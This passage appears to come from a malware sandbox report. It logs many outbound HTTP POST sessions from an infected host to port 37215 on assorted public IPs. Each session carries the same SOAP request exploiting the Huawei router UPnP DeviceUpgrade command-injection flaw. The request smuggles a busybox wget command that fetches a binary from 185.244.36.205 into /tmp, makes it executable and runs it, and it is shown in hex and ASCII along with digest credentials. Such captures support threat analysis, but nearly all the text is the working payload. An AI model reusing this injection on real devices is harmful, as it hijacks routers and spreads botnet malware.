                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1867192.168.2.153440097.10.169.4337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948367119 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1868192.168.2.1545512156.244.160.12337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948389053 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1869192.168.2.155082637.13.254.18537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948431969 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1870192.168.2.1540912190.148.197.19937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948435068 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1871192.168.2.154011894.193.5.6037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948435068 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1872192.168.2.1541444181.151.206.18637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948460102 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1873192.168.2.154290845.147.220.23937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948477983 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1874192.168.2.1558490157.235.37.637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948496103 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1875192.168.2.1543372222.31.152.19537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948509932 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1876192.168.2.155694841.187.38.337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948533058 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1877192.168.2.1537348181.42.104.24337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948550940 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
